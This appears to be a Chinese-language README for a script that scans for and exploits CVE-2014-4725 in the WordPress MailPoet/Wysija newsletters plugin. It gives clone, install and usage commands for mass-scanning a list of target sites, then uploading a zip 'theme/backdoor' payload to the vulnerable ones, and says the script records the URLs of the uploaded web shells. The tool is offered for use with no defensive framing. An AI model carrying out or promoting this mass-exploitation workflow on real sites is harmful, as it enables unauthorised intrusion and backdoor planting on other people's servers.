此脚本用于扫描和利用 WordPress 中 CVE-2014-4725 漏洞(mailpoet/wysija newsletters)。
git clone https://github.com/username/CVE-2014-4725.git
cd CVE-2014-4725
pip install requests
扫描目标
python exploit.py --scan targets.txt
targets.txt 包含目标列表(每行一个,不含 http://)
利用目标
python exploit.py --exploit vuln.txt --payload file/zip.zip
vuln.txt 包含已确认存在漏洞的目标
--payload 是包含要上传的主题/后门的 zip 文件
输出
vuln.txt > 易受攻击的目标列表
shell.txt > 已上传 shell 的 URL